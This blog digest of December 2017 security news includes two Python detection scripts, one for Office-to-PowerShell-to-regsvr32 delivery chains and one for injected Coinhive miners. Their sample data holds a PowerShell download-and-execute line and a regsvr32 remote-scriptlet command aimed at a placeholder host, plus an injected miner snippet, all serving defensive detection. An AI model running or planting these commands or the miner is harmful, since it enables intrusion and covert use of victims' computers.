Computer News & Safety tips – Harry Waldron MVP

Microsoft Security Updates – DECEMBER 2017

Below are key resources documenting this recent monthly Microsoft Patch Tuesday release

https://isc.sans.edu/forums/diary/December+Microsoft+Patch+Tuesday+Summary/23123/

http://blog.talosintelligence.com/2017/12/ms-tuesday.html

https://portal.msrc.microsoft.com/en-us/security-guidance/summary

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month’s advisory release addresses 34 new vulnerabilities with 21 of them rated critical and 13 of them rated important. These vulnerabilities impact Edge, Exchange, Internet Explorer, Office, Scripting Engine, Windows, and more.

Luckily, none of the vulnerabilities have been exploited in the wild or have been disclosed prior to today. The list includes the malware protection engine update that was released on Friday. Probably the most interesting vulnerability is the remote code execution in Windows RRAS (CVE-2017-11885). According to Microsoft, this vulnerability can be exploited via RPC on servers that have routing enabled. (RRAS is the Routing and Remote Access Service). I am a bit confused why Microsoft rates this one only as “important”. Maybe because RRAS is not enabled by default.

Windows Defender – Two Critical vulnerabilities patched DEC-2017

The Microsoft Malware Protection Engine used by Windows Defender was recently patched for two critical vulnerabilities. Because the engine updates itself through the normal definition-update channel, most systems receive this fix automatically, but it is worth confirming the engine version after the update. Details for CVE-2017-11937 and CVE-2017-11940 are noted below:

https://www.infosecurity-magazine.com/news/microsoft-patches-two-critical/

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11937

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11940

Microsoft has released fixes for two critical flaws in its Windows Defender product which could allow attackers to completely take control of a targeted system.  CVE-2017-11937 and CVE-2017-11940 are remote code execution (RCE) vulnerabilities that exist when the Microsoft Malware Protection Engine (MMPE) doesn’t properly scan a specially crafted file, leading to memory corruption.

A remote attacker could therefore use a specially crafted file to execute arbitrary code, leading to a full system compromise. The file could be emailed, IM’d or delivered via a compromised website, the alert noted.  As the engine automatically scans files in real-time, the bugs could be easily exploited.

Malware – Keylogger found by researcher ZwClose patched on some HP laptops

A dormant keylogging capability, disabled by default but present in the Synaptics touchpad driver, is being patched on some HP laptops as described below:

http://www.zdnet.com/article/keylogger-uncovered-on-hundreds-of-hp-pcs/

Hewlett Packard has issued an emergency patch to resolve a driver-level keylogger discovered on hundreds of HP laptops.  The bug was discovered by Michael Myng, also known as “ZwClose.” The security researcher was exploring the Synaptics Touchpad SynTP.sys keyboard driver and how laptop keyboards were backlit and stumbled across code which looked suspiciously like a keylogger.

In a blog post, ZwClose said the keylogger, which saved scan codes to a WPP trace, was found in the driver.  While logging was disabled by default, given the right permissions, it could be enabled through changing registry values and so should a laptop be compromised by malware, malicious code — including Trojans — could take advantage of the keylogging system to spy on users.

Apple – DEC 2017 critical security updates

More details for the Apple DEC 2017 critical security updates are documented in links below 

https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23107/

https://support.apple.com/en-us/HT201222

After a rushed release of iOS 11.2 over the weekend to fix a “December 2nd Crash” bug, and last week’s special update to fix the passwordless root authentication bypass in macOS, Apple today released its official set of security updates. With this, we also received details about the security issues patched in iOS this weekend. Apple’s different operating systems share a lot of code with each other, and as a result, they also share some vulnerabilities. I am trying to organize the details in a table below (starting with macOS. Others will be added soon)

Security Breach – BITCOIN exchange NICEHASH compromised

Below is an early report on this security compromise; an investigation is in progress with the authorities.

http://www.eweek.com/cloud/bitcoin-exchange-nicehash-hacked-as-cryptocurrency-hits-new-highs

Though NiceHash has not publicly disclosed the number of lost Bitcoins, according to a Reuters report, 4,700 Bitcoins (BTC) were stolen from NiceHash. The value of Bitcoin has surged dramatically on Dec. 7, with prices ranging from $15,000 to a high of $20,000 as of 1:30 PM ET, putting the value of the theft in the range of $70.5 to $94 million.

Malware – Poison Ivy RAT new delivery techniques DEC-2017

RAT = Remote Access Trojan

The Poison Ivy RAT has been revamped and is now using new evasion and distribution techniques. TechTarget security expert Nick Lewis explains the new attack methods that enterprises should look out for.

http://searchsecurity.techtarget.com/answer/Poison-Ivy-RAT-What-new-delivery-techniques-are-attackers-using

FireEye researchers found a Poison Ivy RAT campaign using new social engineering, evasion and distribution techniques to spread the malware, which is capable of key logging, password theft, and taking screen and video captures. What new attack and delivery methods should enterprises be on the lookout for with this remote access Trojan?

FireEye researchers wrote about an attack using the Poison Ivy RAT, where a phishing email is used to get the victim to open a malicious Word document and execute a macro.  The emails were targeted at individuals working in the Mongolian government and claimed the documents contained webmail login instructions or information on a state law proposal.

The macro used a PowerShell script that downloads malware from the internet, along with decoy documents to divert the victim’s attention. The script writes its data to the registry, taking advantage of a vulnerability in AppLocker by using regsvr32.exe to install fileless malware on the endpoint.
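The delivery chain above (Word macro, then PowerShell downloading a payload, then regsvr32.exe used to run code without dropping a file) leaves a recognisable trail in process-creation logs. The scanner below is an added example, not code from the TechTarget answer or from FireEye's report. It assumes the logs are Sysmon-style process-creation events flattened to one `key=value | key=value` line each (the four sample lines are constructed here, and the 203.0.113.5 address is a documentation placeholder), and it assumes that the "AppLocker vulnerability" the answer mentions is the well-known regsvr32.exe + scrobj.dll scriptlet trick; if the campaign used a different regsvr32 invocation, adjust `REGSVR32_SCRIPTLET`.

```python
"""Flag Office -> script host -> regsvr32 delivery chains in process logs.

Added example, not from the original article. Event format is an
assumption: one event per line, fields as 'Key=Value' joined by ' | '.
"""
import re
from typing import Dict, List, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe"}

# regsvr32 pulling a remote scriptlet: regsvr32 /s /n /u /i:<url or .sct> scrobj.dll
REGSVR32_SCRIPTLET = re.compile(r"/i:\s*(https?://\S+|\S+\.sct)", re.IGNORECASE)
# PowerShell fetching content or hiding its command line behind -EncodedCommand
PS_DOWNLOAD = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|-enc(odedcommand)?\b)",
    re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Image=... | ParentImage=... | CommandLine=...' into a dict (keys lowercased)."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Return the lowercased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the detection tags that apply to one process-creation event."""
    tags: List[str] = []
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parentimage", ""))
    cmd = ev.get("commandline", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        tags.append(f"office-spawned-script-host:{parent}->{image}")
    if image == "regsvr32.exe" and "scrobj.dll" in cmd.lower() and REGSVR32_SCRIPTLET.search(cmd):
        tags.append("regsvr32-remote-scriptlet")
    if image == "powershell.exe" and PS_DOWNLOAD.search(cmd):
        tags.append("powershell-download-or-encoded")
    return tags


def scan(lines) -> List[Tuple[str, str]]:
    """Scan an iterable of event lines; return (ProcessId, tag) pairs for every hit."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for tag in classify(ev):
            findings.append((ev.get("processid", "?"), tag))
    return findings


# Constructed sample log: two malicious events (4120, 4188) and two benign ones.
SAMPLE_LOG = r"""
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE | CommandLine=powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/decoy.ps1')" | ProcessId=4120
Image=C:\Windows\System32\regsvr32.exe | ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=regsvr32.exe /s /n /u /i:http://203.0.113.5/update.sct scrobj.dll | ProcessId=4188
Image=C:\Windows\System32\regsvr32.exe | ParentImage=C:\Windows\System32\msiexec.exe | CommandLine=regsvr32.exe /s C:\Program Files\Vendor\lib.dll | ProcessId=5012
Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE | ParentImage=C:\Windows\explorer.exe | CommandLine="WINWORD.EXE" /n | ProcessId=3980
"""

if __name__ == "__main__":
    for pid, tag in scan(SAMPLE_LOG.splitlines()):
        print(pid, tag)
```

The parent/child rule is the one that generalises: a document reader should never be the parent of a script host, whatever the payload. The command-line rules are cheaper to evade (an attacker can rename arguments or proxy through another binary), so treat them as corroboration rather than as the only signal.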

Leadership – Leaders can better prepare for 2018 through Reflective thinking

John Maxwell shares an excellent article on the value of reflective thinking, applied in a lessons-learned fashion to 2017. Reflecting back on both good and bad experiences can improve results in 2018.

http://johnmaxwellcompany.com/blog/how-looking-back-leaders-prepare-for-the-future

In today’s fast-paced and highly competitive corporate environment, it’s never been more important for your leaders to push pause and reflect on what happened last year in order to best plan for the year ahead. Reflective thinking can help leaders prepare for the future & thrive in the following five ways:

1. Gives True Perspective — What were their successes? What did they learn? It’s important to reflect on experiences because human beings have the tendency to take things for granted.

2. Gives Emotional Integrity — Reflective thinking enables leaders to distance themselves from the intense emotions of particularly good or bad experiences and stop carrying around emotional baggage.

3. Gives Confidence in Decision-Making — Every leader must make snap judgments from time to time—and later wonder if he or she did the right thing. Reflective thinking can help to diffuse that doubt.

4. Helps Keep the Big Picture in Mind — Reflective thinking puts ideas and experiences into a more accurate context. It encourages leaders to ponder what had been done and observed.

5. Takes a Good Experience and Makes It a Great Experience — It’s not necessarily experience that is valuable; it’s the insight leaders gain because of the experience. Reflective thinking turns experience into insight. An experience becomes valuable when it informs or equips leaders to meet new experiences.

macOS 10.13.1 – Root vulnerability critical security patch released

Apple has just released an emergency patch to lock down the “root” account, which on affected systems had no password set. In certain settings, the “macOS 10.13.1 root vulnerability” allowed the password challenge to be bypassed entirely, giving superuser access. This bug is serious and Apple quickly responded with a “patch now” update.

https://redmondmag.com/articles/2017/11/29/apple-issuing-macos-high-sierra-patch.aspx

Apple is issuing a patch today for macOS High Sierra users that fixes a major password-bypass flaw in that operating system. The flaw lets anyone access a system with superuser privileges by using the user name “root” and a blank password. Apple is releasing Security Update 2017-001, which is designed to fix a logic error in the credentials validation process, according to a Nov. 29 Apple support article. The fix is only for macOS High Sierra 10.13.1 users. Older macOS High Sierra versions aren’t affected, according to Apple.

More can be found here:

https://blogs.msmvps.com/harrywaldron/2017/11/29/macos-10-13-1-root-vulnerability-allows-new-admin-account-without-password/

Verizon 5G Wireless – 2018 implementation planned for Sacramento

Widespread implementation of the high-speed 5G standard is still a few years away. Verizon will start making commercial service available in a few regional areas in 2018 as standards like the new 5G radio specification are finalized. Sacramento has been designated as one target city for this new high-speed wireless standard.

Verizon commercializing 5G fixed wireless access in 2018

Throughout this year, Verizon has tested 5G fixed wireless access in 11 U.S. markets, which the company said included “several hundred cell sites that cover several thousand customer locations.” Now Verizon says it will use that technology to deliver residential broadband services in three to five markets next year.

The carrier will make the commercial service available first in Sacramento, Calif., during the second half of 2018. Given the timing, Verizon’s commercial launch should follow the 3GPP’s release of the 5G New Radio specification, which is tracking for June 2018. Operators in the U.S. and around the world have looked to 5G fixed wireless access as a way to deliver multi-gigabit-per-second throughput speeds without needing to deploy fiber directly to homes and premises, which is a costly and time-consuming process.

Malware – Coinhive cryptocurrency miner steals visitors CPU power on infected websites

The Coinhive cryptocurrency mining facility is being misused as a new hacking tool. Cybercriminals can secretly embed this JavaScript on vulnerable websites with weak security controls and mine digital currency for themselves using visitors’ CPUs. There is no notification to visitors that any mining is taking place.

https://www.pcmag.com/news/357535/why-hackers-love-cryptocurrency-miner-coinhive

A brilliant idea to monetize internet traffic appears to be running amok.  You may have encountered it. Computer code that has found its way into tens of thousands of websites secretly siphons CPU processing power to mine a digital currency called Monero.

The code’s developer, Coinhive, rakes in the dough, but some security researchers claim it’s a form of malware, and say the code is lining the pockets of hackers, too. “It’s becoming a new revenue stream for cybercriminals,” said Troy Mursch, an independent security researcher.

Coinhive first released its cryptocurrency miner in September as a novel way for websites to generate revenue. Once embedded into a website, the code mines the digital currency Monero by borrowing visitors’ CPU processing power. The more visitors, the more money earned. Site owners take a 70 percent share, while Coinhive grabs the rest.

That may sound great, but there’s one big problem: the Coinhive code often doesn’t tell website visitors that any mining is taking place. It can simply borrow CPU processing power via the browser, without any warning.  Mursch found the crypto miner in over 30,000 random sites, many of which don’t appear to be using the Coinhive code deliberately. Among them was PolitiFact, a fact-checking service which briefly hosted the Coinhive code in October because its site was hacked.
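Because the miner is ordinary JavaScript embedded in the page, a site owner (or a visitor) can find it by looking for the Coinhive loader and the miner constructor in the HTML that is actually served. The scanner below is an added example, not code from the PCMag article or from Coinhive. It assumes Coinhive's public browser API of the time, in which a page loads the library from coinhive.com/lib/ and then calls `new CoinHive.Anonymous(siteKey, options)` or `new CoinHive.User(...)`; the two sample pages are constructed here and the site key is a placeholder, not a real one.

```python
"""Find an embedded Coinhive miner in served HTML.

Added example, not from the original article. Markers are the public
Coinhive loader URL and constructors; sample pages are constructed.
"""
import re
from typing import Dict, List, Optional

# <script src="..."> tags, and the bodies of inline <script> blocks
SCRIPT_SRC = re.compile(r'<script[^>]+src\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# Hosts that served the Coinhive library (assumption: these two variants)
LOADER_HOSTS = ("coinhive.com/lib/", "coin-hive.com/lib/")
# Miner constructor and the site key that tells Coinhive whom to pay
MINER_CTOR = re.compile(r"new\s+CoinHive\.(Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9_-]+)['\"]")
# Optional throttle: 0.3 means the miner idles 30% of the time
THROTTLE = re.compile(r"throttle\s*:\s*([0-9.]+)")


def scan_html(html: str) -> Dict[str, object]:
    """Report loader URLs, miner constructors (with site keys) and throttle found in a page."""
    loaders: List[str] = []
    miners: List[Dict[str, str]] = []
    throttled: Optional[float] = None
    for src in SCRIPT_SRC.findall(html):
        if any(host in src.lower() for host in LOADER_HOSTS):
            loaders.append(src)
    for body in INLINE_SCRIPT.findall(html):
        for kind, key in MINER_CTOR.findall(body):
            miners.append({"kind": kind, "site_key": key})
        match = THROTTLE.search(body)
        if match:
            throttled = float(match.group(1))
    return {
        "loader_urls": loaders,
        "miners": miners,
        "throttled": throttled,
        "mining": bool(loaders or miners),
    }


# Constructed sample: a page with the miner injected into its <head>
INFECTED_PAGE = """<html><head><title>News</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLESITEKEY', {throttle: 0.3});
  miner.start();
</script>
</head><body><p>Latest headlines</p></body></html>"""

# Constructed sample: a clean page with its own script and an analytics include
CLEAN_PAGE = """<html><head>
<script src="https://example.com/js/app.js"></script>
<script>window.app = {mode: "live"};</script>
</head><body><p>Latest headlines</p></body></html>"""

if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page))
```

Run this against the HTML the web server actually returns (and, for a site that has been hacked, against the CMS templates and any injected database content), not against the files you think you deployed. String matching only catches the plain form of the miner; a copy served through a proxy domain or obfuscated loader will need a different marker, and a sustained CPU spike on every page view remains the symptom to investigate.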